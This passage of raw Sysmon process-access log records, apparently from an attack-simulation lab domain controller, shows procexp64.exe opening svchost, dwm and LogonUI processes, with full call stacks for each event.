rs\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791051Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791050Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791049Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791048Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791047Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791046Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791045Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791044Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791043Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791042Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791041Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791040Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791039Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791038Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791037Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791036Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791035Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791034Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\T